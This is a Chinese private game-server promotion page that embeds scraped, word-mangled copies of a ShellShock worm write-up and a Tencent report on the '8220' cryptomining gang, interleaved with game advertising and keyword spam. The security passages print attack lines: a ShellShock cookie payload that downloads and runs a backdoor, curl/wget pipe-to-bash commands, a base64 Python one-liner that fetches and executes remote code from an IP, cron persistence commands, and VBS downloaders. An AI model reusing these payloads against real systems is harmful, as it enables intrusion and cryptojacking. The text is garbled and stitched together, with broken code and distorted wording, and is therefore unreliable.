最新消息:本站【魔域私服发布网】每日更新魔域相关资讯文章,每日发布精选魔域私服,各种版本,应有尽有。来吧!兄弟!一起体验经典吧!

魔域私服脚本命令:关于 ShellShock 蠕虫阐明

心得攻略 admin 9浏览 0评论

【文章摘要】 比来,BASH爆出一个近程代码执行缝隙:CVE-2014-6271。今朝已发明行使这个缝隙的蠕虫木马,黑客经过行使bash缝隙进犯有缝隙的服务器,近程履行恶意代码指令,下载然后履行后门顺序。

比来,BASH爆出 一个近程代码执行缝隙:CVE-2014-6271。今朝已发明行使这个缝隙的蠕虫木马,黑客经过行使bash缝隙进犯有缝隙的服务器,近程履行恶意代码 指令,下载然后履行后门顺序。 今朝,腾讯电脑管家等Windows平安产物已发明并查杀歹意行使“破壳”缝隙的木马。

向服务器发送歹意组织的HTTP恳求

Cookie, ().{.:;.};.wget /tmp/besh /tmp/besh; /tmp/besh;

因为bash缝隙,形成服务器履行以下指令

wget /tmp/besh /tmp/besh; /tmp/besh;

进犯流程示意图

PAYLOAD : Linux backdoor 阐明

该文件是一个linux的后门BOT顺序,会毗邻近程C&C Server 领受饬令,履行sh指令,停止DDos进犯等。

节制饬令列表:

! PING-PONG:雷同心跳的恳求呼应

! GETLOCALIP:获得当地IP

! SH: 履行sh饬令

! SCANNER ON | OFF:扫描启动,封闭

! HOLD:HOLD Flooding

! JUNK: JUNK Flooding

! UDP: UDP Flooding

! TCP: TCP Flooding

! KILLATTK: 竣事进犯使命

魔域私服脚本命令

! LOLNOGTFO:竣事后门顺序

相关文章:“8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸收集,豫备建议DDoS进犯

2020-05-09 16:10:38

腾讯平安要挟情报中心检测到“8220”挖矿木马变种进犯,“8220”挖矿团伙善于行使缝隙入侵服务器,进犯windows、linux零碎,行使多款挖矿木马停止门罗币挖矿,并传布Tsunami僵尸收集木马,可被该团伙用来停止DDoS进犯。

一、靠山

腾讯平安要挟情报中心检测到“8220”挖矿木马变种进犯。“8220”挖矿团伙善于行使WebLogic、JBoss反序列化缝隙,Redis、Hadoop未受权接见缝隙等Web缝隙进犯服务器挖矿。近期我们发明该团伙在进犯流动中经过Apache Struts近程代码执行缝隙(CVE-2017-5638)、Tomcat弱口令爆破停止传布的木马大幅增添。

木马在横向挪动阶段会行使Python完成的Redis未受权缝隙接见缝隙对随机生成的约16万个IP停止扫描进犯,,终究在沦陷机械植入多款门罗币挖矿木马和Tsunami僵尸收集木马,后者被该团伙用来停止DDoS进犯。

“8220”挖矿木马团伙的进犯方针包孕Windows和Linux服务器,在其利用的FTP服务器上,可以发明针对分歧操作系统的进犯模块。该团伙释放挖矿木马时,会搜检服务器是不是有其他挖矿木马运转,将一切竞争挖矿木马历程竣事,以独有服务器资源。

凭据代码的相似性、C2关联性、挖矿时利用的沟通门罗币钱包和配置文件解密方式、类似的FTP服务器,腾讯平安专家以为,2020年头泛起的StartMiner与“8220”挖矿木马属于统一团伙。该团伙以后版本恶意程序与C2服务器的通讯已不再利用“8220”端口,凭据近期捕捉到的样本对其进犯偏好利用的文件名停止总结,发明其具有利用多种剧本包孕VBS、PHP、Python、Powershell、Shell停止组合进犯的特色。

二、解决方案

魔域私服脚本命令

企业运维人员可参考以下方式手动消灭Linux和Windows零碎传染的挖矿木马,参考平安建议提拔服务器的安全性。

1. Linux零碎

a. Kill历程/tmp/sh、/tmp/x32b、/tmp/x64b

b. 删除文件

魔域私服脚本命令

/tmp/i686(md5: D4AE941C505EE53E344FB4D4C2E102B7)、

/tmp/ x86_64(md5: 9FE932AC3055045A46D44997A4C6D481)

/tmp/x32b(md5: EE48AA6068988649E41FEBFA0E3B2169)、

魔域私服脚本命令

/tmp/x64b(md5: C4D44EED4916675DD408FF0B3562FB1F)

c. 删除包括“”、“”的crontab设计使命

平安建议:

a. Redis 非必要环境不要露出在公网,利用足够健壮的Redis口令

b. Tomcat服务器设置装备摆设高强度暗码认证

c. 设置ssh非交互方式登录时StrictHostKeyChecking=ask或StrictHostKeyChecking=yes

2. Windows零碎

a. 、、issaasss、、、、、、、

b. 删除文件:

c:\windows\temp\

c:\windows\temp\

C:\Windows\Temp\

C:\ProgramData\guvpgnkpwv\

C:\ProgramData\tumtkffywq\issaasss

C:\Windows\temp\

C:\Windows\temp\

C:\Windows\Temp\

%HOMEPATH%\

%HOMEPATH%\

c. 删除履行内容包括“、、、”的设计使命

平安建议:

a. 实时修复Apache Struts高危缝隙;

b. Tomcat服务器设置装备摆设高强度暗码认证。

推荐当局机构、大中型企业、科研单位采取腾讯平安完好解决方案片面提拔信息系统的安全性。

魔域私服脚本命令

腾讯平安解决方案布置示意图(图片可缩小)

政企用户可凭据营业利用场景布置恰当的平安产物,并凭据腾讯平安要挟情报中心供应的谍报数据设置装备摆设各节点联防联动、一致调和经管,提拔全体收集抗攻击能力。

腾讯平安系列产品应对8220挖矿木马的呼应清单以下:

利用 场景 平安产物 解决方案 威 胁 情 报 腾讯T-Sec 要挟谍报云查效劳 (SaaS) 1)8220挖矿木马黑产团伙相关IOCs已入库。 各类平安产物可经过“要挟谍报云查效劳”供应的接口提拔要挟辨认才能。可参考: 腾讯T-Sec 初级要挟追溯零碎 1)8220挖矿木马黑产团伙相关信息和谍报已撑持检索。 网管可经过要挟追溯零碎,阐明日记,停止线索研判、追溯收集入侵泉源。T-Sec初级要挟追溯零碎的更多信息,可参考: 云原生 平安 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量停止要挟检测与自动阻挡,已撑持: 1)行使Apache Struts近程饬令履行缝隙、Redis未受权接见缝隙相关联的IOCs已撑持辨认检测; 2)撑持下发访问控制划定规矩封禁方针端口,自动阻挡Redis未受权接见缝隙相关接见流量。 有关云防火墙的更多信息,可参考:

腾讯T-Sec 主机平安 (Cloud Workload Protection,CWP) 1)云镜已撑持Apache Struts近程饬令履行缝隙、Redis未受权接见缝隙的检测; 2)已撑持查杀8220挖矿木马家族样本。 腾讯主机平安(云镜)供应云上终端的防毒杀毒、防入侵、缝隙经管、基线经管等。关于T-Sec主机平安的更多信息,可参考: 腾讯T-Sec 收集资产风险监测零碎 (腾讯御知) 1)腾讯御知已撑持监测全网资产是不是受Apache Struts近程饬令履行缝隙、Redis未受权接见缝隙影响。 关于腾讯T-Sec收集资产风险监测零碎的更多信息,可参考: 腾讯T-Sec 平安运营中间 基于客户云端平安数据和腾讯平安大数据的云平安运营平台。已接入腾讯主机平安(云镜)、腾讯御知等产物数据导入,为客户供应缝隙谍报、要挟发明、事务措置、基线合规、及走漏监测、风险可视等才能。 关于腾讯T-Sec平安运营中间的更多信息,可参考: 非云企业平安防护 腾讯T-Sec 初级要挟检测零碎 (腾讯御界) 基于网络流量停止要挟检测,已撑持: 1)行使Apache Struts近程饬令履行缝隙、Redis未受权接见缝隙相关联的IOCs已撑持辨认检测; 2)对行使Apache Struts近程饬令履行缝隙、Redis未受权接见缝隙入侵的相关和谈特点停止辨认检测; 关于T-Sec初级要挟检测零碎的更多信息,可参考: 腾讯T-Sec终端平安管理系统(御点) 1)可查杀8220挖矿木马团伙入侵释放的后门木马程序、挖矿木马程序; 2)企业终端管理系统已撑持检测黑产行使Apache Struts近程饬令履行缝隙、Redis未受权接见缝隙入侵相关的网络通信。 腾讯御点供应企业终端的防毒杀毒、防入侵、缝隙经管、基线经管等才能,关于T-Sec终端平安管理系统的更多材料,可参考:

更多产物信息,请参考腾讯平安官方网站

三、行使 Struts 缝隙( CVE-2017-5638 )入侵服务器挖矿

Apache Struts是一款用于建立企业级Java Web利用的开源框架,Struts2存在近程代码执行的严重缝隙(缝隙编号S2-045,CVE编号:CVE-2017-5638),并定级为高风险,影响版本局限为Struts – Struts – Struts 。

该缝隙能答应黑客近程代码执行,相当于整台服务器已托管给黑客,黑客可以行使此缝隙获得web利用的源程序,点窜web利用内容,获得数据库暗码并窃取数据库信息,更改零碎代码,更改数据库暗码等等。

黑客批量扫描Web服务器并针对存在CVE-2017-5638缝隙的机械停止进犯,。

c:\windows\temp\:

Set Post = CreateObject(“”)

Set Shell = CreateObject(“”)

“GET”,”hxxp”,0

()

Set aGet = CreateObject(“”)

魔域私服脚本命令

= 3

= 1

()

()

“C:/Windows/temp/”,2

10000

魔域私服脚本命令

(“C:/Windows/temp/”)

Set Post = CreateObject(“”)

Set Shell = CreateObject(“”)

“GET”,”hxxp”,0

()

Set aGet = CreateObject(“”)

= 3

= 1

()

()

” C:/Windows/temp/”,2

10000

(” C:/Windows/temp/”)

Set Post = CreateObject(“”)

Set Shell = CreateObject(“”)

魔域私服脚本命令

“GET”,”hxxp”,0

()

Set aGet = CreateObject(“”)

= 3

= 1

()

()

” C:/Windows/temp/”,2

10000

(” C:/Windows/temp/”)

,该样本拷贝本身到C:\ProgramData\guvpgnkpwv\,然后接见下载解密的更新配置文件url,将挖矿配置文件信息cfg、cfgi释放到该文件夹下。

,可是因为其利用多个公有矿池挖矿,实践收益会远大于这个数量。

,寄存至C:/Windows/temp/,并直接传入挖矿参数开启挖矿。

c:\windows\temp\:

Set Post = CreateObject(“”)

魔域私服脚本命令

Set Shell = CreateObject(“”)

“GET”,”hxxp”,0

()

Set aGet = CreateObject(“”)

= 3

魔域私服脚本命令

= 1

()

()

“C:/Windows/temp/”,2

10000

(“C:/Windows/temp/ –donate-level=1 -k -o -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”)

四、爆破进犯 Tomcat 服务器挖矿

该团伙行使缝隙进犯胜利后,会向方针服务器植入多款挖矿木马停止门罗币挖矿。

Tomcat 是由 Apache 开辟的一个 Servlet 容器,完成了对 Servlet 和 JSP 的撑持,并供应了作为Web服务器的一些特有功用,如Tomcat经管和节制平台、平安域经管和Tomcat阀等, /manager/html为tomcat自带经管功用后台,若是暗码强度不高,轻易被黑客破解入侵。

黑客针对Tomcat服务器进行扫描和暴力破解,然后将留存在FTP服务器上的PHP木马和VM木马下载到沦陷机械,行使php木马持续下载挖矿木马。

1. 经过system履行cmd饬令,,寄存至c:\windows\temp\,传入参数开启挖矿:–donate-level=1 -k –max-cpu-usage 100 -o -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B

2. 、,行使ftp饬令从服务器ftp[:]、,传入挖矿参数启动挖矿;

魔域私服脚本命令

3. ,并写入以下代码,:

Set objXMLHTTP=CreateObject(“”)

“GET”,”hxxp”,false

()

If Then

Set objADOStream=CreateObject(“”)

“C:\Windows\Temp\”

Set objADOStream=NothingEnd if

Set objXMLHTTP=Nothing

Set objShell=CreateObject(“”)

(“C:\Windows\Temp\ –donate-level 1 -o -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”)

4. 、。

5. ,,。

1.

2. 装置Linux下载工具:

apt-get install wget -y;

yum install wget -y;

魔域私服脚本命令

apt-get install curl -y;

yum install curl -y;

3. ,运转后rm -rf删除文件:

get -q -O – | bash -sh;

url -fsSL | bash -sh;

魔域私服脚本命令

wget -q -O – | bash -sh;

curl -fsSL | bash -sh;

cur -fsSL | bash -sh;

lwp-download /tmp/

魔域私服脚本命令

bash /tmp/ rm -rf

4. 解码base64编码的python剧本并运转,最初history -c删除纪录。

Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9hLnB5IikucmVhZCgpKSc=

解码:

魔域私服脚本命令

python -c ‘import urllib;exec((“”).read())’

Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9iLnB5IikucmVhZCgpKSc=

解码:

python -c ‘import urllib;exec((“”).read())’

Powershell

1. 、。

2. 找到历程能够是其他挖矿木马的端口毗邻,杀死对应历程

3. 、

“Update service for Oracle productsm”,并删除旧的设计使命。

4. 婚配文件名,加入杀软历程和竞品挖矿木马历程,,。

Python

,该剧本担任下载32位、64位Linux零碎版本挖矿木马i686、x86_64,并经过饬令chomd设置读、写、运转三种权限,然后运转挖矿。

i686、x86_64是由XMRig顺序编译的Linux版本挖矿木马

五、组建 Tsunami 僵尸收集停止 DDoS 进犯

、64位基于Linux零碎的Tsunami(海啸)僵尸收集木马x64b、x32b。

Tsunami会行使近程代码执行缝隙,扫描、定位和进犯懦弱的零碎,进犯胜利会会致使僵尸收集完整节制装备。Tsunami经过IRC和谈与C2服务器通讯,领受指令并建议HTTP、UDP类型的DDoS进犯。

六、横向挪动

行使 Redis 未受权接见缝隙

、,。

,此中方式一名获得本机IP的A段和B段,然后顺次遍历0~256,1~256构成C段和D段;方式二为随机生成10万个IP,清扫内网IP地址;最初把两种方式生成的IP兼并到同一个列表失掉约16万个IP。

对每一个IP停止6379端口(Redis效劳)探测毗邻,若是端口开放,持续判定是不是存在Redis未受权接见缝隙。

Redis在默许环境下,。若是没有接纳相关的安全策略会使Redis效劳完整露出在公网上。若是在没有设置暗码认证(普通为空)的环境下,攻击者可以在未受权接见Redis的环境下,行使Redis本身的供应的config饬令,停止文件的读写等操作,包孕将本人的ssh公钥写入到方针服务器的 /root/.ssh文件夹下的authotrized_keys文件中,进而可以利用对应的私钥直接利用ssh效劳登录方针服务器。

若是被扫描IP存在Redis未受权接见缝隙,经过饬令将curl、(写入“/var/spool/cron”、“/var/spool/cron/crontabs”),每1分钟履行一次。

curl -fsSLk -max -time 40 http[:] -o ~/.ntp ||

wget –quiet –no-check-certificate –timeout=40 http[:] -o ~/.ntp

SSH 毗邻

,从/.ssh/known_hosts中获得已认证的近程主机ID,:

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/ ];

相关文章:嘟嘟魔域登陆器 最新免费版 下载

嘟嘟魔域登陆器是一款针对同名游戏所推出的私服版本登录客户端。之前有良多用户想要找到一个对照好玩的SF版本,那末你目下当今就可以尝尝该SF登录器,置信能给你带来不一样的操作体验。

魔域相关软件 魔域合30星蝎虎辅佐 魔域sf挂合宝宝免费版 535魔域辅佐下载 T3坏魔域辅佐收费下载 魔域私服辅助工具 魔域私服合宝宝辅助工具 魔域挂机辅佐 001my魔域辅佐下载 pk255魔域私服辅佐

【老手攻略】

1、进游戏前,确保客户端为《 轮回之境》客户端,进入游戏才会一切画面显示完好

2、建立脚色后不要出门打怪,翻开背包QQ群礼包取得三洞神器配备(加群取得激活码).

3、世界BS爆魔魂珠可以 翻开取得MS,或神火NPC换取充值配备大礼包

4、神力10级在赛尔npc开启神火1·2号格 神力30级开启神火3·4号格 神力88级开启神火5·6号格 开启神火7·8号格.

(本服建议:不知火舞,琉璃之佣,孙悟空三只双属性宝宝)最多只能出征2只

【版本引见】

【神火零碎】独家更新真神火零碎,全新各大职业神火零碎同步官方。超炫,危险高,魔石商铺可采办神火资料进修!

【VIP专属跪拜零碎】独家更新至尊VIP专属跪拜零碎,发挥妙技可以饬令雷鸣局限内一切玩家跪拜展露王者霸气。还有他们上交的魔石!

【全区老迈】最新更新全区老迈,应战全服,博得全服老迈尊位,开启收税零碎。让你坐着享用钱!

【VIP专属地图】本服独家更新专属地图,空想之光礼包有快捷传送。刷新蜘蛛,每30分钟刷新超等BOSS爆少量的顾惜物质!

【战斗力试炼柱】独家更新战斗力试炼全区老迈零碎,天天可以跪拜,砸鸡蛋,扔鲜花等等更有少量魔石支付!

【军团正本】独家更新军团正本:军团BOSS每小时刷出7只军团兽,爆各类物质。

【更新世界BS爆VIP碎片,神火宝箱,】

【荒古正本】完整同步官方荒火古墓,黑水/熔火/雷炎三大正本,入包100W魔石!

【菲尔斯神殿】全新同步官方,过正本通关后爆少量物质,25星等等!还能抽奖博得重磅嘉奖!

【会员工资】独家会员签到零碎:VIP6-8 每小时都能在2号摊位前面支付少量魔石,真正完成在线时候长也能当老迈!

【兽王碉堡】天天限3次进入,爆元素+28魔魂加40-255的配备箱子,玩家可以打造打造属于本人的配备!

【浑沌迷域】更新官方最新的正本浑沌迷域,天天14:00和20:00开启,百人大战!掠取少量的物质!

【独家更新】2018年7月3号更魔石商铺增添6-25星副宠,本服副宠最高2500分。此中6-19星悉数出售1魔石!

【独家更新】雷鸣增添BOSS王国正本{需求爱娜项链}BOSS爆少量物质,25星等等少量物质!

【传奇正本】传奇正本玩家天天进5次应战传奇专属正本,疾速冲战的福利。嘉奖爱娜项链,25星,阿拉玛!)

【独家正本】增添幻界迷城中心,每20分钟将刷新焚天帝君超等BOSS。PK忌讳之地!

【独家特征】迷宫增添少量BOSS和蜘蛛和怪物攻城流动,小怪也添加了魔石入包,PK热情首选之地!

魔域私服脚本命令

【独家特征】雷鸣8只蜘蛛,野外30个蜘蛛点(隐雾池沼5只,沙漠5只,雪狼冰原3只,池沼6只,海岛6只,地址随机10-15分钟刷新)

【副 本】九星正本,雷炎,黑水,熔火,四海圣剑,幻界,帝国,BOSS爆少量的魔石,,女神资料,25星,等少量的物质!

魔域私服脚本命令

【独家特征】更新各个地图刷新世界BS,爆各类物质,魔魂珠 翻开取得MS或换充值配备礼包,40-60分钟刷新)

魔域私服脚本命令

【1-10星正本】本服开放1-10星正本,1-5星需求魔石进入,阿拉玛需求爱娜项链。正本内刷新少量BOSS,爆少量等物质

【迷宫小怪】本服增添VIP5-VIP8迷宫小怪入包300-500-1000-1500 长时间玩家的福利

【幻界正本】每20分钟幻界刷新4只超等BOSS,击杀后爆物质!(公共正本没法PK)

【四海正本】本服开放四海剑圣正本,击杀BOSS后爆少量等主要物质!(需求精灵钥匙)

【个人大乱斗】每小时10-12分开启。!

【打宝地图】每小时50分强行拉全服玩家进打宝地图,嘉奖丰富少量魔石等你拿[制止PK]

【众神宝藏】嘉奖少量的1-3,命运也是实力的一种,来应战吧

魔域私服脚本命令

【帝国正本】玩家支付击杀野外BOSS将取得精灵钥匙,进入帝国正本击杀BOSS嘉奖少量魔石和。嘉奖远古宝箱兵

【小时PK赛】每小时30分系统将强行理睬呼唤全区玩家进入PK场,活到最初的玩家嘉奖388W魔石,胜者为王。

魔域私服脚本命令

【正本钥匙】一切的野外BOSS都爆爱娜项链碎片,可以到BOSS王国NPC分解。70级以上BOSS爆奥秘钥匙。通俗玩家的发家之路

【游戏引见】设置完满,修复已知缝隙,为玩家打造 最热情的游戏新端,让你热情无处不在!

【封星引见】 。2-3天解封一次。

【封星引见】 。

【骑士引见】 打斗PK 骑士的录用 守护骑士[特别很是主要] 判决骑士[特别很是主要] 圣光骑士[特别很是主要] 永久骑士[主要]。

【注意事项】 若是碰到进入游戏有若是看不到宝宝 魔石商铺 配备等物品,直接重启电脑便可。。

转载请注明:魔域私服发布网 » 魔域私服脚本命令:关于 ShellShock 蠕虫阐明

发表我的评论
取消评论
表情